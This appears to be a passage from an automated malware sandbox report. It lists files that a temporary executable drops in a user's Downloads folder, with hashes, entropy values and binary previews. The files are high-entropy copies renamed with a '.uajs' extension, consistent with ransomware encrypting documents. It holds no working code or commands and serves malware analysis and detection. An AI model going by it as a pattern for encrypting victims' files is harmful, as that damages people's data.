Preview:	EOWRV.2m%:~ q..d...6..C{..y.\|..,.c....i.L7....P...m..w..:A..D.....k.m8D..m...........K}.....u.y......F..lwn6..C.@..5.1D....TP.=..pD.s.M.....y(..\]..&X].....5R..7;...=-.....!a..7.".M.b....90...%`..6^yI....^^...?.).B.V8....sY...q...m.GO...X......uY...k..0...qt....c.....?.e......0....Y.V]..A')pE....1..j....k.s......iy{..".......#{......].iu.).G.`R&i\....i.L.k......=7c.:.)....5/"....,....../1...=...7...e-..>.}q.f..V.z..J......,...i....;y@.:'T..Y...g..C./r. .....=s..JD....:N.ea.:.cz..c..j.`oK..J$.]S.S...1...gX...... ...aY...2....r..>..LK.dj...h...$ ..CV.HNcW...;.d.7B..p..(Z.E...7(......Y.F."0.td.=.pve.....B_.(...[.6...MhT...Kq..!b9T/\|h. .....(.d.E.e..DZ...N..}_..dnj..j...."e.....P..7..].5..l...G....^.....Z...o.;.....Ji>.uz..'...:@....e>z.Z.<.mK..b..Rh.^.".....+)......5_..hs....\|f....Zf-.I....y....l.].\|.U..\|....$q..i.$.n.p..V..}8..x......0C...../z1~B.....J...@.....{.&...`}...>v.n...n.......)....d...H.y..0...'.-/..<x.....E.P...a........T&

C:\Users\user\Downloads\EWZCVGNOWT.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836909609045677
Encrypted:	false
SSDEEP:	24:ZhK+JHQEW5q35hXL5+VvU/MA+6mAeu1sjli+Tya19kC6JC4ZK0KaBgxUTv2w1bD:L5WIrmU/MA+jPxjXeokC6JtsUqyD
MD5:	1061FB5E6BB47FBDC190A8DA5965E860
SHA1:	3F775AAB2DAA902C26BA198D71298D4A1381A76A
SHA-256:	CE353113FC83C204371C45375923563E2A5B710395B3D2850B83BF33330BB7F8
SHA-512:	9F08D3F510523555174BAE5F047642D94830580A89608E89067116210F97218478CB3CF413CC83DE46FBA720D89CAE4FE4000DC12D1C9CD55F67F63EC9D0733D
Malicious:	false
Preview:	EWZCV.X.......q[.F...].2.i.........g ..."..o...,.i......7... ..._...x.....h.DWK..&o..p....V.d./=. O^..Yg.X....S.../}..t.{....2.Q...."S...I_..........}.c<.&B.#..BI..D.dJ..b....A...w.y.G@og(..9R..'+...[..%..S..:RP..j.F.\|.6.-.K..........L.X......--._...R..9..M'5,.U!..FJ4...?f$....;...h.....F.LIm....y.R4\.3..a.....8.cV...Q...Uy..Q^.....h./.O.......z..W$.M.L..F1...D........2Q...:~-..l.34:,.\|.K..A#......],..'}..h...K0T.j=.I.NO..\N..2.(...P\..S:..............F}.}...82.cg6.[.H.C..bQ..RIH.N.X.d..U\y;...&...Y(..H~2...~V$..........'...]....\|.(.2.4"...g.qx^ekb..k....T...M.f <R.7...r.@.$....>LA.....t..au.....8..~.vk.`9..l..S.?.j/J.....F...(>...)~yv.H..sE.J)..7"..8.,.zy...1U..."{. 2....qR...I.i.$.... ~3..y...p..u.._..M..&b....&8.<).y-.[.....ViE.P.....8.....>p.O..VjC..R......r.CW........Q{Fg...[.3..)..W.Y.i...-qo1..%..%..F.....u.st.i.=.8..o2.&i.D..6.K"....2"B.wk3?>...L...9...h.....gvn..D...C..>.a.}.}.\|..{...l...8{#.......3......9D.]Q......

C:\Users\user\Downloads\EWZCVGNOWT.png.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836909609045677
Encrypted:	false
SSDEEP:	24:ZhK+JHQEW5q35hXL5+VvU/MA+6mAeu1sjli+Tya19kC6JC4ZK0KaBgxUTv2w1bD:L5WIrmU/MA+jPxjXeokC6JtsUqyD
MD5:	1061FB5E6BB47FBDC190A8DA5965E860
SHA1:	3F775AAB2DAA902C26BA198D71298D4A1381A76A
SHA-256:	CE353113FC83C204371C45375923563E2A5B710395B3D2850B83BF33330BB7F8
SHA-512:	9F08D3F510523555174BAE5F047642D94830580A89608E89067116210F97218478CB3CF413CC83DE46FBA720D89CAE4FE4000DC12D1C9CD55F67F63EC9D0733D
Malicious:	false
Preview:	EWZCV.X.......q[.F...].2.i.........g ..."..o...,.i......7... ..._...x.....h.DWK..&o..p....V.d./=. O^..Yg.X....S.../}..t.{....2.Q...."S...I_..........}.c<.&B.#..BI..D.dJ..b....A...w.y.G@og(..9R..'+...[..%..S..:RP..j.F.\|.6.-.K..........L.X......--._...R..9..M'5,.U!..FJ4...?f$....;...h.....F.LIm....y.R4\.3..a.....8.cV...Q...Uy..Q^.....h./.O.......z..W$.M.L..F1...D........2Q...:~-..l.34:,.\|.K..A#......],..'}..h...K0T.j=.I.NO..\N..2.(...P\..S:..............F}.}...82.cg6.[.H.C..bQ..RIH.N.X.d..U\y;...&...Y(..H~2...~V$..........'...]....\|.(.2.4"...g.qx^ekb..k....T...M.f <R.7...r.@.$....>LA.....t..au.....8..~.vk.`9..l..S.?.j/J.....F...(>...)~yv.H..sE.J)..7"..8.,.zy...1U..."{. 2....qR...I.i.$.... ~3..y...p..u.._..M..&b....&8.<).y-.[.....ViE.P.....8.....>p.O..VjC..R......r.CW........Q{Fg...[.3..)..W.Y.i...-qo1..%..%..F.....u.st.i.=.8..o2.&i.D..6.K"....2"B.wk3?>...L...9...h.....gvn..D...C..>.a.}.}.\|..{...l...8{#.......3......9D.]Q......

C:\Users\user\Downloads\GIGIYTFFYT.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846499964195684
Encrypted:	false
SSDEEP:	24:JiW8Nul75uToDxT7aWIS0r5CmIHunAQwX2Nzzvxwjb8DLVbw1bD:JiJOP1T7aWytBIHunAQpNzz5wjbcFyD
MD5:	06B5F7B27E36C9BF1397A4254D099D16
SHA1:	73638A0C50A9C797FDADD8FB04747EFA7944CCAC
SHA-256:	0665CB88C032C0A631F596870DDB4DB492AB6181D7EF97B27837309EAFEE7231
SHA-512:	92248FF84FF5BBAE56F6C00DDEAC08C470786BC7FE3EB8BC3252E8FD898C73F2A55F0F2E09F2B61322558D5D2CFB40E5B6114FD9F4155E2615114BAD9BA4168D
Malicious:	false
Preview:	GIGIY.r.....Y.X..:..U.`...:Y.GY.^......I.. s...RI..y..0...!..`.I%.....4.c..-.d.....?.I.6/%....J.../...o..D....J.N.g.-...ir..))...A.V#r`v.%...}.@8...J.HG[2..Lb\|.z..W..k....@"A...6....6...R.I.=.0+.7y...".#_Bx.&b.\......&.n..&..{.\.".........$.P..h.}\|4.rD.....#..^m...q.n...x.8.].K.0 ...#.j.d.WTr....{..tkWn...XR...ry.R.Z.8...4... C.>5.0j.Hv.$..R...m.......).P(.l.wUz..d.w.Le,..=....XQ.g\.-JWW........M..P"...u..A..AuX=yP....'..J..\|Y8Z.}M.Z)f.@...$.&Y.p3.........)........J3}......X`.......K..3jlih..~.].]"uE.6:<I....9f...=$.e=F^...B....<:...e.......s<.....$.....)lb.....r. .$F..0o ..../...Ak...5..N...wj..O.<.`.......s...w.E....+..Z.._.Ue..z. ..P...}..].V4yD..,c?.....U.O:Ka.g..r.I..x.Y.R7..mw0!u..J.!K.~.n..'ob(..0...v...7.A..F%.D2...C.,.......`K.U.-......:Qg.bzo.(..dL.l...K...Or.{...{..1U.=....0rF!.I..u"......,...T.:=\|(..W...j.P@../<..r......d8..&6(.............V.......,....]8.qIR.G&..}......q.....N ...l.X..fv..CR..)....gy.kI].Dy....'.@3.^.....)8.

C:\Users\user\Downloads\GIGIYTFFYT.mp3.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846499964195684
Encrypted:	false
SSDEEP:	24:JiW8Nul75uToDxT7aWIS0r5CmIHunAQwX2Nzzvxwjb8DLVbw1bD:JiJOP1T7aWytBIHunAQpNzz5wjbcFyD
MD5:	06B5F7B27E36C9BF1397A4254D099D16
SHA1:	73638A0C50A9C797FDADD8FB04747EFA7944CCAC
SHA-256:	0665CB88C032C0A631F596870DDB4DB492AB6181D7EF97B27837309EAFEE7231
SHA-512:	92248FF84FF5BBAE56F6C00DDEAC08C470786BC7FE3EB8BC3252E8FD898C73F2A55F0F2E09F2B61322558D5D2CFB40E5B6114FD9F4155E2615114BAD9BA4168D
Malicious:	false
Preview:	GIGIY.r.....Y.X..:..U.`...:Y.GY.^......I.. s...RI..y..0...!..`.I%.....4.c..-.d.....?.I.6/%....J.../...o..D....J.N.g.-...ir..))...A.V#r`v.%...}.@8...J.HG[2..Lb\|.z..W..k....@"A...6....6...R.I.=.0+.7y...".#_Bx.&b.\......&.n..&..{.\.".........$.P..h.}\|4.rD.....#..^m...q.n...x.8.].K.0 ...#.j.d.WTr....{..tkWn...XR...ry.R.Z.8...4... C.>5.0j.Hv.$..R...m.......).P(.l.wUz..d.w.Le,..=....XQ.g\.-JWW........M..P"...u..A..AuX=yP....'..J..\|Y8Z.}M.Z)f.@...$.&Y.p3.........)........J3}......X`.......K..3jlih..~.].]"uE.6:<I....9f...=$.e=F^...B....<:...e.......s<.....$.....)lb.....r. .$F..0o ..../...Ak...5..N...wj..O.<.`.......s...w.E....+..Z.._.Ue..z. ..P...}..].V4yD..,c?.....U.O:Ka.g..r.I..x.Y.R7..mw0!u..J.!K.~.n..'ob(..0...v...7.A..F%.D2...C.,.......`K.U.-......:Qg.bzo.(..dL.l...K...Or.{...{..1U.=....0rF!.I..u"......,...T.:=\|(..W...j.P@../<..r......d8..&6(.............V.......,....]8.qIR.G&..}......q.....N ...l.X..fv..CR..)....gy.kI].Dy....'.@3.^.....)8.

C:\Users\user\Downloads\GIGIYTFFYT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830832191764816
Encrypted:	false
SSDEEP:	24:YgNRsbhBvnp1M+6IpxEBQWkZnSZSimUfri3E7t16v+xq6bvpvlw1bD:YagnvnpG+6cOQrn4SipW34t16QqO/yD
MD5:	3140F32A30A673BDF119A51F0F7693A3
SHA1:	BDC98C2BBB5BE4B242F19D15B77CE9B35AB72A77
SHA-256:	A66F0F814CEEA7C25538DDE6CD783BF767BFCE75C41F7292F8A14D3ADC95131D
SHA-512:	EC70CF6E6B0496686B93685A46FB5F196E4DA321859E4E644D370C9D3F20DDEE2457B42051DCA90A080D96F6BA0A750D76573EF98A6CC96AFA643983C52C0206
Malicious:	false
Preview:	GIGIY..._C.....[$..z.$CQ.....y.F.n.."....5.A.H...u....k.R.C....RpJ..gz...xCW.....O`u..y..Hb.Ie..':......HG-..e..S3qb.S."...p.$.3..Z..&.<..xF.....D.......H...+.......).L....p......K.JQE.k.b..I.:...i..1.Q.W.KO!.2d2>..fh...9..j...gps....3...A..v....J..`.A....=..,..b....~..w#...."..U_j..................%g......Q..C.U......lbRY).;..u..,..d.jbq&.E.G...b.JO..EH..G...]t8.....k./.c....E.:.GCA..--......Y.&.[I...'.TA.......2.c....~a...6^C.Z8...+.5.....l.w5.f[D....>.2B7..y....d!$..$!..e.3&.....$..k..<.....e..<.>v..[.*23..\.n.iv....Y.hf8'.u...../.:..~.F......K.e...V4..s."..T_f.n..<....&...B....9..@.....ID.n......7I.Qc....cY2..1~.Y.C{]......;..AXC.............SgXB).uk...k....4.h.)6..)].]......./.=.7.$.%.wL.PA-=i...R8...b...k..$........<.^.~._..%..3j...........\..E9.%5.3?Uhg.......&a....@..c[.e..{P.r.......k.g..s.p.%.`c..I..Q..8...!..r...-2.z.q.[P....p..H.%?.........X.....w.<..8......L....n...-..^.}}.P......B...H.k_W....w...Q?.o)Bhbx.\|....E

C:\Users\user\Downloads\GIGIYTFFYT.pdf.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830832191764816
Encrypted:	false
SSDEEP:	24:YgNRsbhBvnp1M+6IpxEBQWkZnSZSimUfri3E7t16v+xq6bvpvlw1bD:YagnvnpG+6cOQrn4SipW34t16QqO/yD
MD5:	3140F32A30A673BDF119A51F0F7693A3
SHA1:	BDC98C2BBB5BE4B242F19D15B77CE9B35AB72A77
SHA-256:	A66F0F814CEEA7C25538DDE6CD783BF767BFCE75C41F7292F8A14D3ADC95131D
SHA-512:	EC70CF6E6B0496686B93685A46FB5F196E4DA321859E4E644D370C9D3F20DDEE2457B42051DCA90A080D96F6BA0A750D76573EF98A6CC96AFA643983C52C0206
Malicious:	false
Preview:	GIGIY..._C.....[$..z.$CQ.....y.F.n.."....5.A.H...u....k.R.C....RpJ..gz...xCW.....O`u..y..Hb.Ie..':......HG-..e..S3qb.S."...p.$.3..Z..&.<..xF.....D.......H...+.......).L....p......K.JQE.k.b..I.:...i..1.Q.W.KO!.2d2>..fh...9..j...gps....3...A..v....J..`.A....=..,..b....~..w#...."..U_j..................%g......Q..C.U......lbRY).;..u..,..d.jbq&.E.G...b.JO..EH..G...]t8.....k./.c....E.:.GCA..--......Y.&.[I...'.TA.......2.c....~a...6^C.Z8...+.5.....l.w5.f[D....>.2B7..y....d!$..$!..e.3&.....$..k..<.....e..<.>v..[.*23..\.n.iv....Y.hf8'.u...../.:..~.F......K.e...V4..s."..T_f.n..<....&...B....9..@.....ID.n......7I.Qc....cY2..1~.Y.C{]......;..AXC.............SgXB).uk...k....4.h.)6..)].]......./.=.7.$.%.wL.PA-=i...R8...b...k..$........<.^.~._..%..3j...........\..E9.%5.3?Uhg.......&a....@..c[.e..{P.r.......k.g..s.p.%.`c..I..Q..8...!..r...-2.z.q.[P....p..H.%?.........X.....w.<..8......L....n...-..^.}}.P......B...H.k_W....w...Q?.o)Bhbx.\|....E

C:\Users\user\Downloads\QCOILOQIKC.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855013353995533
Encrypted:	false
SSDEEP:	24:+/sVSOw89m5dOd/oSO9GhARqdyBaaSLLaQlPop0cyXRtlFrw1bD:et4m2S8hd2vqLaQNTXRrByD
MD5:	939372A12BAF038F9653C9584980C54A
SHA1:	4A7431E6324B2545C36234C9C614B30DA876549E
SHA-256:	6BF41D5F11DDC5E3B59BAD4288AEF8379DDBBB4755C24D618693AEDB04CAB1CA
SHA-512:	F0B085DC80C47C88B6319D71478964211F8891A3E22D604884D08A35026CB2A5886C26163194DCF3589562D3127DCAA6001A91F6631BBAE28D03FC6BB8FD87BB
Malicious:	false
Preview:	QCOIL..1iF:..S....,..7../.H.K......5.#hYH....@_Dh......?...L....U[......t..\...IA..7..{M.V[...Fu.d+.t...\|.U...y<........S$?p..^.DN.4R.!(.......P{....!.#.....L...3I...f...t....._......We._...+u....\|...1.V.........k.@.9.d.<.^/..IBP..qt.5}.].....'....N1.G..Z....+X...S.2..A...-.(.9..b...N./?.R........A79).....#=...~..U..d.....-d`......U...bJ.~..Q.`.!.~.'..=>1.0h..w.#,%'...Pr...B.&.G{.U<G.$,.z.V.y.....CP&.B...ZA...eX.M.....&..Xt..p.8...Z.X.W..C..5.....6.....R....5..?P...e.R._...n.iS.x..0{...&+..M}...t....o$.....>F.Di...>........n*....Q.s...%W.K.e\|....2Z.."+%5.'On."...w.:b.j.g]_........7.8...kxk.........As.....0."V..1...f...BC...u....D..4T..D .s.eM...+..a..d..1^....U..%??=.I.k...Y=$ctn..h]p..GG.$`Y..e.....yU.oCF.N.zP..lg.M2.......W....Z..m.....}...m%~.......1.i..'.E.....VV...w....`.aq(.....P..A.v...T.~,,..k._.aq 8..B?w......G...........5.Q.9.D.........I..a..9....6....yl.:...V.(.Q.-.....e.....1.....w....n....>x...j.!....._II........=I......u.FK

C:\Users\user\Downloads\QCOILOQIKC.png.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855013353995533
Encrypted:	false
SSDEEP:	24:+/sVSOw89m5dOd/oSO9GhARqdyBaaSLLaQlPop0cyXRtlFrw1bD:et4m2S8hd2vqLaQNTXRrByD
MD5:	939372A12BAF038F9653C9584980C54A
SHA1:	4A7431E6324B2545C36234C9C614B30DA876549E
SHA-256:	6BF41D5F11DDC5E3B59BAD4288AEF8379DDBBB4755C24D618693AEDB04CAB1CA
SHA-512:	F0B085DC80C47C88B6319D71478964211F8891A3E22D604884D08A35026CB2A5886C26163194DCF3589562D3127DCAA6001A91F6631BBAE28D03FC6BB8FD87BB
Malicious:	false
Preview:	QCOIL..1iF:..S....,..7../.H.K......5.#hYH....@_Dh......?...L....U[......t..\...IA..7..{M.V[...Fu.d+.t...\|.U...y<........S$?p..^.DN.4R.!(.......P{....!.#.....L...3I...f...t....._......We._...+u....\|...1.V.........k.@.9.d.<.^/..IBP..qt.5}.].....'....N1.G..Z....+X...S.2..A...-.(.9..b...N./?.R........A79).....#=...~..U..d.....-d`......U...bJ.~..Q.`.!.~.'..=>1.0h..w.#,%'...Pr...B.&.G{.U<G.$,.z.V.y.....CP&.B...ZA...eX.M.....&..Xt..p.8...Z.X.W..C..5.....6.....R....5..?P...e.R._...n.iS.x..0{...&+..M}...t....o$.....>F.Di...>........n*....Q.s...%W.K.e\|....2Z.."+%5.'On."...w.:b.j.g]_........7.8...kxk.........As.....0."V..1...f...BC...u....D..4T..D .s.eM...+..a..d..1^....U..%??=.I.k...Y=$ctn..h]p..GG.$`Y..e.....yU.oCF.N.zP..lg.M2.......W....Z..m.....}...m%~.......1.i..'.E.....VV...w....`.aq(.....P..A.v...T.~,,..k._.aq 8..B?w......G...........5.Q.9.D.........I..a..9....6....yl.:...V.(.Q.-.....e.....1.....w....n....>x...j.!....._II........=I......u.FK

C:\Users\user\Downloads\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845550870388165
Encrypted:	false
SSDEEP:	24:CnBtLDc5XZ0I4JSmzEbDgW1KM1AGf4EjGepiUTS97+TioXw1bD:iHY5XlmzwDgWwMe+27SpXyD
MD5:	00379A8118E554AAD89733BDED62BE9E
SHA1:	7310E71302BCAC945D58EA0D3AA1A74422991C70
SHA-256:	DC38545BD0BCB5F5B270F2AC721ACEED4448E9330090D229D44A350C95AF8888
SHA-512:	1360E2C7BF985EE9883DBCEF570F4CFAAAE9A6DB97D2E7BC80877487DC837652F2107B0AD27E591ADC455E2D7AD0D05C34895A040AA1C1A507835593136FC084
Malicious:	false
Preview:	TQDFJ...E..#n-B..P.T..c.0k.A..F.../.;..t]\|..J.kpW.o}3C.p..ykHR..xP.....\|.z-@.....=y.?.=......x.k,.l@..d.>..E....4....`.[2.,.j..+.....-...A.......B....B.ihy..O..d...A....b....}..1(....(H....P.&..N...o...K..X....`...c......j..Y..<.8:......QY.S%O...b....j...u...+?.Y.S..g.......W..B]..fI.o.u..\...Xr..D+x..........3..v..<...X....:0.S..]....:...qe}...6.PW.)..;L..^...D....)).....)8.2.B]..OE{..[.R...N........J,7.....F...}3K.[........T..O..4.&...QF{...qs.&~.....5.4VWJ"FR..QL.o...VZ.a.n..@.8[.N....:...5AC..E.,...`...5i.q.....+].v...d..Pd.`.`r.l.-...{Q...GH..C.%-.1gm.^{H.w.....V..>z#?i....$&a^...<+...ho...sH....I..V.B:..SL.....d5.f\|....S..k....%3.x..14.......i.u?.....u.:.7W..{.........{.....a.R.;Z....4S..D..... ...F.65&....E..K.g..a.?..]>......V.xn.>..E..bFq,.F.4.U..x..P2.../g..*..G...\.-.E.hL]..=.........#.qp...F.^.$.Drc..-..t....:.......;.9.L:.8X#...fa.g_...aKn...~..;x...%....RS.....j,..o.S..q.+...Mw...a0A..8...Ky.../Z... .&....

C:\Users\user\Downloads\TQDFJHPUIU.jpg.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845550870388165
Encrypted:	false
SSDEEP:	24:CnBtLDc5XZ0I4JSmzEbDgW1KM1AGf4EjGepiUTS97+TioXw1bD:iHY5XlmzwDgWwMe+27SpXyD
MD5:	00379A8118E554AAD89733BDED62BE9E
SHA1:	7310E71302BCAC945D58EA0D3AA1A74422991C70
SHA-256:	DC38545BD0BCB5F5B270F2AC721ACEED4448E9330090D229D44A350C95AF8888
SHA-512:	1360E2C7BF985EE9883DBCEF570F4CFAAAE9A6DB97D2E7BC80877487DC837652F2107B0AD27E591ADC455E2D7AD0D05C34895A040AA1C1A507835593136FC084
Malicious:	false
Preview:	TQDFJ...E..#n-B..P.T..c.0k.A..F.../.;..t]\|..J.kpW.o}3C.p..ykHR..xP.....\|.z-@.....=y.?.=......x.k,.l@..d.>..E....4....`.[2.,.j..+.....-...A.......B....B.ihy..O..d...A....b....}..1(....(H....P.&..N...o...K..X....`...c......j..Y..<.8:......QY.S%O...b....j...u...+?.Y.S..g.......W..B]..fI.o.u..\...Xr..D+x..........3..v..<...X....:0.S..]....:...qe}...6.PW.)..;L..^...D....)).....)8.2.B]..OE{..[.R...N........J,7.....F...}3K.[........T..O..4.&...QF{...qs.&~.....5.4VWJ"FR..QL.o...VZ.a.n..@.8[.N....:...5AC..E.,...`...5i.q.....+].v...d..Pd.`.`r.l.-...{Q...GH..C.%-.1gm.^{H.w.....V..>z#?i....$&a^...<+...ho...sH....I..V.B:..SL.....d5.f\|....S..k....%3.x..14.......i.u?.....u.:.7W..{.........{.....a.R.;Z....4S..D..... ...F.65&....E..K.g..a.?..]>......V.xn.>..E..bFq,.F.4.U..x..P2.../g..*..G...\.-.E.hL]..=.........#.qp...F.^.$.Drc..-..t....:.......;.9.L:.8X#...fa.g_...aKn...~..;x...%....RS.....j,..o.S..q.+...Mw...a0A..8...Ky.../Z... .&....

C:\Users\user\Downloads\ZGGKNSUKOP.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8411220636372745
Encrypted:	false
SSDEEP:	24:xRBdvkZU8LOCHAmri+AhX/ctV/sr42WBpblMw3nF3f+w1bD:x2iQJHvri/9AErYbp3nFP+yD
MD5:	DA3F2C81AC0F94837E2EBC079249E381
SHA1:	590AE90113EC8D5B639F7264829F1ABBC14C83CA
SHA-256:	3D6AB4333701D2E1B09496B98F82B6C0561148FC7D88E2F7C3D8A5449194D492
SHA-512:	931B491529E42786CA1A6D55025F226FA1C24EEC5A552E65DECDEF9CF35E13BA480724DFC2A058E2421101FCB957D9B0E9BCA59F90A39399175D611F9858BCED
Malicious:	false
Preview:	ZGGKN....>.m..0.H.P...L......E#e......w.k...'...G..-m1..>v...p.K-..#.-.2...~...P.&..^.^.......{1Q.u..._.B8....K.....hR..."/...d..jPg...;.......'.C...iZ.j.'K....=(t.c.`3.vp.7n...%.u{...H.U.Zbn..K....9.......H...n..+".T..e...fAX.Wk.....d....}....}..$rl[..{.8:...D{o.c..P.t...X2..I......m..S..RYB.4D.(.CBcvkm...L...h@.[....8...R..U....xU3.!.....5.j... U.7..b.]..C.H"M...:.../O)3..u....h70..d.e.B.Y!X..y..o..,.._.#..y..O....e.i@_.M<.)..l....Wb5.+..>.B.9.GX.].S$.G.....=.._.........C...d.fz...z...;q.r.......U....+...-..N..-x...K.n.b2.t..&...H.Z]Y"...3......"^....j...P.'........[.E......$....t.........$. F..9...Z.&....\|1...$i./.[\...b..:.H.~.....4.............<...>....9..yJ.]N...Q0..w..(.=.i.:}.6...$l.:...QY.R..hag.....i....7F...<O.4.Oq.+..nt...Un(c....pB}M.Rg...@......bo..."T........M/u. 9.2..)Q{...\.i.H..L2.N...c./U.X$&.@B.-\...8.Fu........=C.......4............B.9.$Ss.x7.*.W.P^..F..f..X....:bN!J\|......e. .k.r.<g7`.9W].nDl..U .9..jS.....o

C:\Users\user\Downloads\ZGGKNSUKOP.pdf.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8411220636372745
Encrypted:	false
SSDEEP:	24:xRBdvkZU8LOCHAmri+AhX/ctV/sr42WBpblMw3nF3f+w1bD:x2iQJHvri/9AErYbp3nFP+yD
MD5:	DA3F2C81AC0F94837E2EBC079249E381
SHA1:	590AE90113EC8D5B639F7264829F1ABBC14C83CA
SHA-256:	3D6AB4333701D2E1B09496B98F82B6C0561148FC7D88E2F7C3D8A5449194D492
SHA-512:	931B491529E42786CA1A6D55025F226FA1C24EEC5A552E65DECDEF9CF35E13BA480724DFC2A058E2421101FCB957D9B0E9BCA59F90A39399175D611F9858BCED
Malicious:	false
Preview:	ZGGKN....>.m..0.H.P...L......E#e......w.k...'...G..-m1..>v...p.K-..#.-.2...~...P.&..^.^.......{1Q.u..._.B8....K.....hR..."/...d..jPg...;.......'.C...iZ.j.'K....=(t.c.`3.vp.7n...%.u{...H.U.Zbn..K....9.......H...n..+".T..e...fAX.Wk.....d....}....}..$rl[..{.8:...D{o.c..P.t...X2..I......m..S..RYB.4D.(.CBcvkm...L...h@.[....8...R..U....xU3.!.....5.j... U.7..b.]..C.H"M...:.../O)3..u....h70..d.e.B.Y!X..y..o..,.._.#..y..O....e.i@_.M<.)..l....Wb5.+..>.B.9.GX.].S$.G.....=.._.........C...d.fz...z...;q.r.......U....+...-..N..-x...K.n.b2.t..&...H.Z]Y"...3......"^....j...P.'........[.E......$....t.........$. F..9...Z.&....\|1...$i./.[\...b..:.H.~.....4.............<...>....9..yJ.]N...Q0..w..(.=.i.:}.6...$l.:...QY.R..hag.....i....7F...<O.4.Oq.+..nt...Un(c....pB}M.Rg...@......bo..."T........M/u. 9.2..)Q{...\.i.H..L2.N...c./U.X$&.@B.-\...8.Fu........=C.......4............B.9.$Ss.x7.*.W.P^..F..f..X....:bN!J\|......e. .k.r.<g7`.9W].nDl..U .9..jS.....o

C:\Users\user\Downloads\ZIPXYXWIOY.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859420686176515
Encrypted:	false
SSDEEP:	24:wcu8xulCqN5UgMJAZnZswTNEHJ/SPlW/Q+qtDU87xqLw1bD:vu8olCqvUgFxGJ/4+sDUg4yD
MD5:	F0FE013E8A0370D3F83FB7CB35918B2E
SHA1:	A8B367AD0A4F70422D55D12048E7D509271D01DB
SHA-256:	B3AD3D2D58E45E8792282F07EC46B7B398CC4A3F1B9DB9C157268FE705A887C9
SHA-512:	4FB2BED886CB5EB8EBF209B5A79990416F9543DD8CCFE131056D9061ABB429B2CD5E8D58B1FB3D6048E8B15E96729B31E8A88B7207D5718BAE2E89DEE4A181E1
Malicious:	false
Preview:	ZIPXYT........-.D...f...b..z...6...r'95...(2..,.F..k{[d.S.U1..............x.2BU?1!.!O...~..f<...6....]_.yD.-.2.zW"......K....z....Q!...p..}[.7.....ZtLo'...E....`.i...K...........Q.x.2}......X..N.../>....q0d:...d..6&..~P..F..q'\|-@bm4pN.(.d8......'FZ.n.f..dy..7..=.wWe....../....._>q..!f..,.^.j).,..Gf..9.........z..a...[..6J.?.i5.....ORH?...M.&.P[...Q.m.\C.y.p..~..A.......O..&MR</;..qs..Q.o.'fp...y+.K .R...P.6\|..v\|...AE.. ....."l...g.;......'..6...#...).A.0.b.R.94B0...YD;. .0..............\..."9..Dm.....AtC.h..\|^......0C.F...{0.f..?..a..R.h`.....}:..l.V.X.E@.bh/thE.J.n.f.[!....I...[..w.8.......b..R./.Z...........D.....7..I.T.N# ."&.. ....8+(...l[f.i.l'.3..3.tg.@......ymc..,........z.~/.-..U.-.........px..._....K...V..h..x\|r....V.6.oY..+@#..c.i.[.=.T...N...7H.f.....w."t.S.se".5.E5..G....if\|..N..'M..z.....-....1\......._`H.....Amx.Z.v..Xr.....w.g.7h...&Z.i.!G....p"....eq-F....d.ye,..6.f.QdX.(....\.Rzb^qLp.Z`.Jzl?..ic#..A..X=:;>s...0.C.5..

C:\Users\user\Downloads\ZIPXYXWIOY.mp3.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859420686176515
Encrypted:	false
SSDEEP:	24:wcu8xulCqN5UgMJAZnZswTNEHJ/SPlW/Q+qtDU87xqLw1bD:vu8olCqvUgFxGJ/4+sDUg4yD
MD5:	F0FE013E8A0370D3F83FB7CB35918B2E
SHA1:	A8B367AD0A4F70422D55D12048E7D509271D01DB
SHA-256:	B3AD3D2D58E45E8792282F07EC46B7B398CC4A3F1B9DB9C157268FE705A887C9
SHA-512:	4FB2BED886CB5EB8EBF209B5A79990416F9543DD8CCFE131056D9061ABB429B2CD5E8D58B1FB3D6048E8B15E96729B31E8A88B7207D5718BAE2E89DEE4A181E1
Malicious:	false
